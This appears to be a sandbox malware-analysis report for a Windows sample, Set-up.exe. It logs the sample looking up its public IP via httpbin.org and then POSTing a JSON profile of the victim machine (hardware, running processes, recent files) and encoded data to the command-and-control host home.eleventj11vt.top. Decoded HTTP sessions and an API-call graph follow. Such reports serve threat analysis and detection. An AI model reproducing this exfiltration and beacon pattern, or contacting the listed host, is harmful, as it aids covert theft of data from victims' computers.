                        Dec 31, 2024 00:33:03.477396965 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:03.477405071 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:06.035794020 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:06.035819054 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:06.035897970 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:06.036082029 CET4973180192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:06.040911913 CET8049731194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:06.620713949 CET4973280192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:06.625663042 CET8049732194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:06.625756979 CET4973280192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:06.625931978 CET4973280192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:06.630784988 CET8049732194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:07.547981024 CET8049732194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:07.548043013 CET8049732194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:07.548125029 CET4973280192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:07.548363924 CET4973280192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:07.553195000 CET8049732194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:08.509848118 CET4973380192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:08.514786005 CET8049733194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:08.515089989 CET4973380192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:08.515726089 CET4973380192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:08.520530939 CET8049733194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:09.893620014 CET8049733194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:09.893896103 CET4973380192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:09.893946886 CET8049733194.87.58.155192.168.2.4
                        Dec 31, 2024 00:33:09.894093990 CET4973380192.168.2.4194.87.58.155
                        Dec 31, 2024 00:33:09.898658037 CET8049733194.87.58.155192.168.2.4
                        TimestampSource PortDest PortSource IPDest IP
                        Dec 31, 2024 00:32:58.594719887 CET5037453192.168.2.41.1.1.1
                        Dec 31, 2024 00:32:58.594768047 CET5037453192.168.2.41.1.1.1
                        Dec 31, 2024 00:32:58.601954937 CET53503741.1.1.1192.168.2.4
                        Dec 31, 2024 00:32:58.602014065 CET53503741.1.1.1192.168.2.4
                        Dec 31, 2024 00:33:02.106849909 CET5037753192.168.2.41.1.1.1
                        Dec 31, 2024 00:33:02.106909990 CET5037753192.168.2.41.1.1.1
                        Dec 31, 2024 00:33:02.585556984 CET53503771.1.1.1192.168.2.4
                        Dec 31, 2024 00:33:02.965569019 CET53503771.1.1.1192.168.2.4
                        Dec 31, 2024 00:33:06.060652018 CET5037953192.168.2.41.1.1.1
                        Dec 31, 2024 00:33:06.060710907 CET5037953192.168.2.41.1.1.1
                        Dec 31, 2024 00:33:06.563453913 CET53503791.1.1.1192.168.2.4
                        Dec 31, 2024 00:33:06.619741917 CET53503791.1.1.1192.168.2.4
                        Dec 31, 2024 00:33:07.566932917 CET5038153192.168.2.41.1.1.1
                        Dec 31, 2024 00:33:07.566978931 CET5038153192.168.2.41.1.1.1
                        Dec 31, 2024 00:33:08.508905888 CET53503811.1.1.1192.168.2.4
                        Dec 31, 2024 00:33:08.508919001 CET53503811.1.1.1192.168.2.4
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Dec 31, 2024 00:32:58.594719887 CET192.168.2.41.1.1.10xf082Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                        Dec 31, 2024 00:32:58.594768047 CET192.168.2.41.1.1.10xf3ffStandard query (0)httpbin.org28IN (0x0001)false
                        Dec 31, 2024 00:33:02.106849909 CET192.168.2.41.1.1.10x957fStandard query (0)home.eleventj11vt.topA (IP address)IN (0x0001)false
                        Dec 31, 2024 00:33:02.106909990 CET192.168.2.41.1.1.10x471aStandard query (0)home.eleventj11vt.top28IN (0x0001)false
                        Dec 31, 2024 00:33:06.060652018 CET192.168.2.41.1.1.10x18d8Standard query (0)home.eleventj11vt.topA (IP address)IN (0x0001)false
                        Dec 31, 2024 00:33:06.060710907 CET192.168.2.41.1.1.10xc961Standard query (0)home.eleventj11vt.top28IN (0x0001)false
                        Dec 31, 2024 00:33:07.566932917 CET192.168.2.41.1.1.10x8c05Standard query (0)home.eleventj11vt.topA (IP address)IN (0x0001)false
                        Dec 31, 2024 00:33:07.566978931 CET192.168.2.41.1.1.10x51caStandard query (0)home.eleventj11vt.top28IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Dec 31, 2024 00:32:58.601954937 CET1.1.1.1192.168.2.40xf082No error (0)httpbin.org52.202.253.164A (IP address)IN (0x0001)false
                        Dec 31, 2024 00:32:58.601954937 CET1.1.1.1192.168.2.40xf082No error (0)httpbin.org34.197.122.172A (IP address)IN (0x0001)false
                        Dec 31, 2024 00:33:02.965569019 CET1.1.1.1192.168.2.40x957fNo error (0)home.eleventj11vt.top194.87.58.155A (IP address)IN (0x0001)false
                        Dec 31, 2024 00:33:06.563453913 CET1.1.1.1192.168.2.40x18d8No error (0)home.eleventj11vt.top194.87.58.155A (IP address)IN (0x0001)false
                        Dec 31, 2024 00:33:08.508919001 CET1.1.1.1192.168.2.40x8c05No error (0)home.eleventj11vt.top194.87.58.155A (IP address)IN (0x0001)false
                        • httpbin.org
                        • home.eleventj11vt.top
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.449731194.87.58.155802688C:\Users\user\Desktop\Set-up.exe
                        TimestampBytes transferredDirectionData
                        Dec 31, 2024 00:33:02.972390890 CET12360OUTPOST /jQURilAbAxjhrGAaBiUq1735578716 HTTP/1.1
                        Host: home.eleventj11vt.top
                        Accept: */*
                        Content-Type: application/json
                        Content-Length: 577923
                        Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 34 33 30 31 38 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                        Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317430187", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
                        Dec 31, 2024 00:33:02.977345943 CET4944OUTData Raw: 5c 2f 77 44 50 36 5c 2f 35 39 47 31 59 72 39 67 5c 2f 2b 43 59 33 37 45 76 77 51 5c 2f 61 31 38 48 5c 2f 46 62 55 5c 2f 69 78 46 34 73 46 39 34 4a 38 52 2b 47 37 44 53 4a 5c 2f 43 5c 2f 69 46 64 47 4d 6c 70 72 65 6d 36 6c 63 58 45 56 39 48 50 59
                        Data Ascii: \/wDP6\/59G1Yr9g\/+CY37EvwQ\/a18H\/FbU\/ixF4sF94J8R+G7DSJ\/C\/iFdGMlprem6lcXEV9HPYalDN5M2mI1s8UVvIv2i4Wd518hYPz\/AMTPEjI\/CrhatxdxDhM2xmW0cbg8DKhk1DB4jHOtjZyp0pRp47HZdQdOLi3UbxKklblhN6H6n4ReFHEfjRxlQ4H4XxuS4DNa+X4\/MYYjP8TjsLlyoZfThUrQlVy7Ls1x
                        Dec 31, 2024 00:33:02.977387905 CET7416OUTData Raw: 5c 2f 33 6e 2b 65 66 74 58 39 66 5c 2f 72 30 32 53 4d 5c 2f 4a 38 2b 48 48 2b 66 7a 71 4a 37 66 50 39 47 62 30 2b 76 79 5c 2f 55 68 38 7a 63 32 7a 2b 4d 5c 2f 38 41 50 4d 5c 2f 36 37 50 38 41 6e 31 39 36 68 71 5a 74 38 68 65 50 74 4a 39 66 33 50
                        Data Ascii: \/3n+eftX9f\/r02SM\/J8+HH+fzqJ7fP9Gb0+vy\/Uh8zc2z+M\/8APM\/67P8An196hqZt8hePtJ9f3P06\/wCe3NM67\/kk3\/8APOP05\/znisjop9fl+pWOzzHcf9s5Ixz7\/wCfp9KbFvk8n+BP+mfH+c\/54qVsyb0\/8h\/4\/X\/PFQ4\/g\/j8rypf3X\/Lv\/np6YroNCHzN3+2JIv3v2j\/AD\/h7ULHPt3j5\/
                        Dec 31, 2024 00:33:02.977473021 CET9888OUTData Raw: 2b 78 31 38 55 72 48 34 50 5c 2f 77 44 42 4f 4c 39 6e 76 78 76 66 2b 47 5c 2f 45 5c 2f 6a 41 66 5a 66 43 48 67 33 54 50 43 5c 2f 67 30 65 47 5c 2f 2b 45 6b 31 33 78 4a 38 54 66 6a 6a 48 38 4d 66 43 6d 6d 36 64 4a 34 77 38 52 2b 45 50 44 46 76 39
                        Data Ascii: +x18UrH4P\/wDBOL9nvxvf+G\/E\/jAfZfCHg3TPC\/g0eG\/+Ek13xJ8TfjjH8MfCmm6dJ4w8R+EPDFv9o8T+LtIW8vNb8S6RYWVh9qu5rr9yI5Po1vj38Uz\/AM2U\/tNYByf+Kr\/Y159B\/wAnbY\/z7V8OfBB8\/wDBMj9kzqf+L2\/sgjHOPl\/b++Fo9AO3rXK\/8FFP+Csmk\/si\/E3wB8JPhto+jfEDxfY67o3iD4
                        Dec 31, 2024 00:33:02.981987000 CET2472OUTData Raw: 33 6a 48 78 6c 34 7a 2b 48 6e 6a 6a 34 68 33 58 6a 7a 56 4c 54 34 58 2b 46 5c 2f 43 76 69 76 55 5c 2f 45 7a 61 52 64 32 4b 61 64 65 33 39 39 39 30 5c 2f 38 45 72 50 32 52 5c 2f 6a 37 38 4f 5c 2f 6a 5a 2b 30 4a 38 62 5c 2f 32 6d 50 42 76 77 31 62
                        Data Ascii: 3jHxl4z+Hnjj4h3XjzVLT4X+F\/CvivU\/EzaRd2Kade39990\/8ErP2R\/j78O\/jZ+0J8b\/2mPBvw1b4mt4h0TwJrXxP8VfCrxO37Qfj3xVB+zh+y1beLvFXg3433ni238K698A9Z8XaX43tk0vRvAmoy3nj6y8RXUfjXy4L3Q7T8owmFw2Bw2HwWCoUsLhMLRp4fDYehCNOjQo0oqFOlThFKMYQikopKySPpc7zvOOJc4zP
                        Dec 31, 2024 00:33:02.982182026 CET2472OUTData Raw: 33 68 66 5c 2f 68 4e 76 44 76 37 50 4f 73 66 45 53 39 2b 41 48 68 33 78 75 4e 48 75 72 36 4d 65 4d 74 45 2b 47 64 68 34 6e 46 39 71 57 72 61 79 4e 56 47 74 61 74 71 57 6f 58 58 43 65 48 66 2b 43 65 50 37 49 76 68 62 51 5c 2f 69 4a 34 58 30 72 34
                        Data Ascii: 3hf\/hNvDv7POsfES9+AHh3xuNHur6MeMtE+Gdh4nF9qWrayNVGtatqWoXXCeHf+CeP7IvhbQ\/iJ4X0r4Z63L4X+Jnw58XfB7V\/DOu\/F741+KvDnhL4TePWZ\/GHwy+C2g+KPiLrGk\/s8+ANfK2IvvCHwEtPhtoDLoXhZI7CNPCXhldJAPB\/2eP2iv21PiH+3L8QPhl8Wfhh8FPAfwXsf2X\/gh8VrDw14U+PWufETxN4S
                        Dec 31, 2024 00:33:02.982243061 CET6180OUTData Raw: 2f 71 70 4a 50 38 41 32 31 78 31 36 65 76 30 71 48 35 78 47 36 62 34 33 65 54 75 49 72 58 30 5c 2f 77 41 66 38 2b 6e 51 64 42 57 6b 32 65 55 38 53 66 38 41 4c 50 38 41 31 73 66 5c 2f 41 43 33 48 66 5c 2f 53 37 76 50 70 78 37 55 79 53 4e 56 6d 64
                        Data Ascii: /qpJP8A21x16ev0qH5xG6b43eTuIrX0\/wAf8+nQdBWk2eU8Sf8ALP8A1sf\/AC3Hf\/S7vPpx7UySNVmdP3myT\/lpJ+\/n6\/y\/nUwH7uFNlx\/2z\/f2\/wCf+elM\/vv+8Tv5n\/tr\/njpQdBD5fmK\/kp8+fNH7r68j\/P4Zojj+588Y8z\/AJZ+V\/5K9f8AP40SQwssb7M9f8\/5\/XueXIsab0kmT\/W++fXr6f5P
                        Dec 31, 2024 00:33:02.982269049 CET6180OUTData Raw: 46 54 78 4e 43 74 4b 64 4b 6e 55 6a 55 66 37 4b 6e 5c 2f 41 49 4c 58 5c 2f 74 45 5c 2f 77 5c 2f 43 7a 34 48 6a 36 36 64 38 51 44 5c 2f 4c 78 2b 74 52 6e 5c 2f 67 74 64 2b 30 64 5c 2f 44 38 4c 5c 2f 41 49 46 6a 36 36 54 38 51 7a 5c 2f 4c 34 69 72
                        Data Ascii: FTxNCtKdKnUjUf7Kn\/AILX\/tE\/w\/Cz4Hj66d8QD\/Lx+tRn\/gtd+0d\/D8L\/AIFj66T8Qz\/L4irX4++Lx4U8C6fqMPjD4zfArwr8Q9CtvCV94o+C3iDxN8S7b4neErTxjrmg6Xp8fiKXSvg\/rPwwtfEWm6V4j07xd4k+H9n8S7\/4k+HNAj1S11bwda+KtF1Xw1aLZaPqV74+8U\/DN9R8H6N4s8H\/ALRPw3\/ZY1d
                        Dec 31, 2024 00:33:03.025193930 CET34608OUTData Raw: 7a 66 32 63 76 2b 79 6d 61 4e 5c 2f 77 43 67 33 46 66 49 73 6e 62 38 66 36 56 39 64 66 73 42 5c 2f 77 44 4a 35 76 37 4f 58 5c 2f 5a 54 4e 47 5c 2f 39 42 75 4b 5c 2f 50 50 46 33 5c 2f 6b 30 5c 2f 69 66 38 41 39 6d 38 34 31 5c 2f 38 41 57 62 7a 49
                        Data Ascii: zf2cv+ymaN\/wCg3FfIsnb8f6V9dfsB\/wDJ5v7OX\/ZTNG\/9BuK\/PPF3\/k0\/if8A9m841\/8AWbzI\/SfCCd\/FrwuVt\/EXgnr\/ANVLlnkf21UUUV\/hUf7vhRRRQB4JdftV\/svWXxjh\/Z2vP2kPgJaftA3Fxb2kHwLuvjB8PIPjHPdXeir4ltbaH4Yy+Ik8bSXFz4dZdft4U0RpJtFZdVjVrEievc7y8tNPtLq\/v
                        Dec 31, 2024 00:33:03.073389053 CET1236OUTData Raw: 5c 2f 4c 33 72 35 59 31 57 34 5c 2f 34 71 7a 78 4c 7a 5c 2f 7a 4d 4f 73 6a 75 4d 48 2b 30 62 72 42 7a 37 34 35 7a 5c 2f 53 76 2b 47 6a 6a 71 6c 68 76 5a 34 58 46 52 70 51 6a 6a 50 72 48 73 61 6c 65 50 75 7a 71 55 6e 53 6c 4b 4d 4b 74 72 4b 6f 36
                        Data Ascii: \/L3r5Y1W4\/4qzxLz\/zMOsjuMH+0brBz745z\/Sv+GjjqlhvZ4XFRpQjjPrHsalePuzqUnSlKMKtrKo6bilCck6ii3TcuSMIx\/wC2PIpVH7ajKUnRVPnjBu6hLmirxvrHmUm5L4W9bczlf0HTJc7eTg9fx\/8Ar9fx9a\/lq\/aLOf2gvjqfX4yfE4\/n421yv6hNJk+7z6H8yOP0\/L2xX8vP7RBz+0B8cz6\/GL4m\/wDq
                        Dec 31, 2024 00:33:03.125004053 CET1236OUTData Raw: 37 5a 49 64 52 30 66 55 62 35 49 6e 6e 74 78 64 4c 62 5c 2f 61 72 59 7a 66 7a 35 66 38 41 42 5a 6e 5c 2f 41 4a 53 43 2b 42 50 2b 7a 4e 5c 2f 43 5c 2f 77 44 36 75 7a 34 6f 31 2b 5c 2f 65 42 4f 64 30 31 34 35 2b 43 4f 66 38 4f 35 72 4b 4e 57 72 78
                        Data Ascii: 7ZIdR0fUb5InntxdLb\/arYzfz5f8ABZn\/AJSC+BP+zN\/C\/wD6uz4o1+\/eBOd0145+COf8O5rKNWrx\/Q4exGOyvFuKxeUZvhMwwed5Fj3Rly4nA4idGhPFZfilKFPHYHB4r2cMZgsPUpfyr43cK55lX0ZvpkeGviLwxXoYL\/iXzM\/EGnwzxTlT\/wBg4q4TzLh7O+BOOsmpYylz4HOsBh8fjaeT8R5ZKnWxOQZ7nGWQx
                        Dec 31, 2024 00:33:06.035794020 CET157INHTTP/1.1 200 OK
                        Server: nginx/1.22.1
                        Date: Mon, 30 Dec 2024 23:33:05 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 1
                        Connection: close
                        Data Raw: 30
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.449732194.87.58.155802688C:\Users\user\Desktop\Set-up.exe
                        TimestampBytes transferredDirectionData
                        Dec 31, 2024 00:33:06.625931978 CET101OUTGET /jQURilAbAxjhrGAaBiUq1735578716?argument=0 HTTP/1.1
                        Host: home.eleventj11vt.top
                        Accept: */*
                        Dec 31, 2024 00:33:07.547981024 CET372INHTTP/1.1 404 NOT FOUND
                        Server: nginx/1.22.1
                        Date: Mon, 30 Dec 2024 23:33:07 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 207
                        Connection: close
                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                        Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.449733194.87.58.155802688C:\Users\user\Desktop\Set-up.exe
                        TimestampBytes transferredDirectionData
                        Dec 31, 2024 00:33:08.515726089 CET174OUTPOST /jQURilAbAxjhrGAaBiUq1735578716 HTTP/1.1
                        Host: home.eleventj11vt.top
                        Accept: */*
                        Content-Type: application/json
                        Content-Length: 31
                        Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                        Data Ascii: { "id1": "0", "data": "Done1" }
                        Dec 31, 2024 00:33:09.893620014 CET372INHTTP/1.1 404 NOT FOUND
                        Server: nginx/1.22.1
                        Date: Mon, 30 Dec 2024 23:33:09 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 207
                        Connection: close
                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                        Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.44973052.202.253.1644432688C:\Users\user\Desktop\Set-up.exe
                        TimestampBytes transferredDirectionData
                        2024-12-30 23:32:59 UTC52OUTGET /ip HTTP/1.1
                        Host: httpbin.org
                        Accept: */*
                        2024-12-30 23:32:59 UTC224INHTTP/1.1 200 OK
                        Date: Mon, 30 Dec 2024 23:32:59 GMT
                        Content-Type: application/json
                        Content-Length: 31
                        Connection: close
                        Server: gunicorn/19.9.0
                        Access-Control-Allow-Origin: *
                        Access-Control-Allow-Credentials: true
                        2024-12-30 23:32:59 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                        Data Ascii: { "origin": "8.46.123.189"}


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Target ID:0
                        Start time:18:32:57
                        Start date:30/12/2024
                        Path:C:\Users\user\Desktop\Set-up.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\Set-up.exe"
                        Imagebase:0xa60000
                        File size:7'101'064 bytes
                        MD5 hash:AE8ED41BD6AAAE48CA2B4615D20F52DF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:1.6%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:39.1%
                          Total number of Nodes:1083
                          Total number of Limit Nodes:64
                          execution_graph 85838 c3cbc0 85839 c3cbce free 85838->85839 85840 c3cbcc 85838->85840 85840->85839 85841 f3c070 85842 f3c09a 85841->85842 85843 f3c0a6 85842->85843 85859 de8f70 85842->85859 85848 f3c0e6 85849 de8f70 8 API calls 85850 f3c0ef GetVersion CryptAcquireContextA 85849->85850 85851 f3c190 GetLastError __acrt_iob_func 85850->85851 85852 f3c146 CryptGenRandom CryptReleaseContext 85850->85852 85870 deb500 18 API calls 85851->85870 85853 f3c1d0 GetLastError __acrt_iob_func 85852->85853 85854 f3c184 85852->85854 85871 deb500 18 API calls 85853->85871 85856 f3c1b9 _time32 85858 f3c1f9 85858->85856 85872 de8e90 _open 85859->85872 85861 de8f82 85862 de8e90 8 API calls 85861->85862 85863 de8fa2 85862->85863 85864 de8f70 8 API calls 85863->85864 85865 de8fb8 85864->85865 85866 df12c0 85865->85866 85867 df12cc 85866->85867 85885 dee050 85867->85885 85869 df12fa 85869->85848 85869->85849 85870->85856 85871->85858 85877 de8eba 85872->85877 85873 de8ef3 _exit 85873->85877 85874 de8f39 _write 85876 de8f53 _close 85874->85876 85874->85877 85875 f46a10 85878 f46a29 85875->85878 85879 f46a2a CryptAcquireContextA 85875->85879 85876->85877 85877->85873 85877->85874 85877->85875 85877->85876 85878->85861 85880 f46a61 85879->85880 85881 f46a79 CryptGenRandom 85879->85881 85880->85861 85882 f46aa6 CryptReleaseContext 85881->85882 85883 f46a9d 85881->85883 85882->85880 85883->85882 85884 f46abd CryptReleaseContext 85883->85884 85884->85880 85886 dee09d localeconv localeconv 85885->85886 85887 def886 _errno 85885->85887 85919 dee0ce 85886->85919 85975 dee503 85887->85975 85888 def993 85891 def9b5 realloc 85888->85891 85976 dee214 85888->85976 85889 dee300 strlen 85889->85919 85890 dee146 isspace 85890->85919 85891->85976 85892 def674 85898 dee1e1 85892->85898 85909 def6b0 free 85892->85909 85892->85976 85893 dee28c 85895 dee2d1 85893->85895 85900 dee2c0 free 85893->85900 85894 dee176 isspace 85894->85919 85901 dee2f1 free 85895->85901 85902 dee2e1 free 85895->85902 85896 def54c 85911 def564 85896->85911 85912 df0250 ungetc 85896->85912 85897 dee18e 85905 dee1a6 85897->85905 85906 deed90 ungetc 85897->85906 85907 dee205 free 85898->85907 85908 dee1f1 free 85898->85908 85899 dee243 85899->85893 85910 dee261 isspace 85899->85910 85900->85895 85900->85900 85901->85976 85902->85901 85903 df0178 85903->85898 85917 df0184 free 85903->85917 85904 def603 85904->85898 85916 def630 free 85904->85916 85904->85976 85905->85898 85918 dee1d0 free 85905->85918 85906->85976 85907->85976 85908->85907 85909->85898 85909->85909 85910->85899 85961 dee26f 85910->85961 85911->85898 85928 def5a0 free 85911->85928 85911->85976 85920 df0274 strtoul 85912->85920 85913 dee388 85914 def5b6 85913->85914 85929 dee4b0 85913->85929 85914->85898 85930 def5d0 free 85914->85930 85915 deecc8 _errno _errno 85915->85929 85916->85898 85916->85916 85917->85898 85917->85917 85918->85898 85918->85918 85919->85889 85919->85890 85919->85892 85919->85894 85919->85896 85919->85897 85919->85899 85919->85913 85925 dee582 85919->85925 85926 dee560 isspace 85919->85926 85919->85975 85920->85975 85920->85976 85921 defed7 tolower 85921->85975 85921->85976 85922 deeb52 85940 deeb63 85922->85940 85941 dee81a 85922->85941 85923 deed17 _errno 85923->85904 85923->85929 85924 defeb6 isxdigit 85924->85975 85925->85898 85935 dee5a0 free 85925->85935 85925->85976 85926->85919 85927 df0742 ungetc 85927->85893 85928->85898 85928->85928 85929->85903 85929->85904 85929->85915 85929->85922 85929->85923 85931 deed02 isspace 85929->85931 85933 dee527 85929->85933 85939 dee6b9 85929->85939 85945 df00b8 ungetc 85929->85945 85929->85975 85930->85898 85930->85930 85931->85929 85934 dee626 _errno 85931->85934 85932 df03d9 tolower 85932->85975 85933->85898 85944 dee538 free 85933->85944 85934->85929 85935->85898 85935->85935 85936 df11a4 ungetc 85936->85975 85937 dee765 85951 df08f9 85937->85951 85937->85975 85937->85976 85938 df0438 tolower 85938->85975 85938->85976 85939->85937 85950 dee701 malloc 85939->85950 85939->85975 85939->85976 85946 deebac malloc 85940->85946 85940->85975 85940->85976 85942 dee86d malloc 85941->85942 85941->85975 85941->85976 85947 dee897 85942->85947 85942->85976 85943 df0927 85943->85898 85959 df0958 free 85943->85959 85943->85976 85944->85898 85944->85944 85945->85929 85952 deebd2 85946->85952 85946->85976 85953 dee8ab malloc 85947->85953 85960 dee8c7 85947->85960 85948 df08d7 ungetc 85948->85975 85949 deea53 malloc 85949->85960 85949->85976 85956 dee71f 85950->85956 85950->85976 85951->85898 85964 df0911 free 85951->85964 85951->85976 85958 deebe6 malloc 85952->85958 85952->85960 85953->85960 85954 dee96f realloc 85954->85975 85955 deeb2d isspace 85955->85975 85963 dee733 malloc 85956->85963 85966 dee74f 85956->85966 85957 dee7ac isspace 85957->85975 85958->85960 85959->85898 85959->85959 85962 deea85 malloc 85960->85962 85960->85975 85961->85893 85961->85927 85962->85960 85963->85966 85964->85898 85964->85964 85965 df0e3e ungetc 85965->85975 85966->85937 85967 def293 strtoll 85967->85975 85967->85976 85968 defc5e strtol 85968->85975 85968->85976 85970 deec9a realloc 85970->85975 85971 df0006 ungetc 85971->85975 85972 df0054 realloc 85972->85975 85973 df0e5d realloc 85973->85975 85974 df0d20 _errno 85974->85975 85975->85887 85975->85888 85975->85892 85975->85912 85975->85920 85975->85921 85975->85924 85975->85932 85975->85933 85975->85936 85975->85938 85975->85943 85975->85948 85975->85949 85975->85954 85975->85955 85975->85957 85975->85961 85975->85965 85975->85967 85975->85968 85975->85970 85975->85971 85975->85972 85975->85973 85975->85974 85975->85976 85977 deed2c _errno 85975->85977 85978 defc10 realloc 85975->85978 85980 deed5e _errno 85975->85980 85984 deb1a0 7 API calls 85975->85984 85976->85869 85977->85898 85979 deed43 85977->85979 85978->85975 85981 deed48 free 85979->85981 85980->85898 85982 deed75 85980->85982 85981->85898 85981->85981 85983 deed78 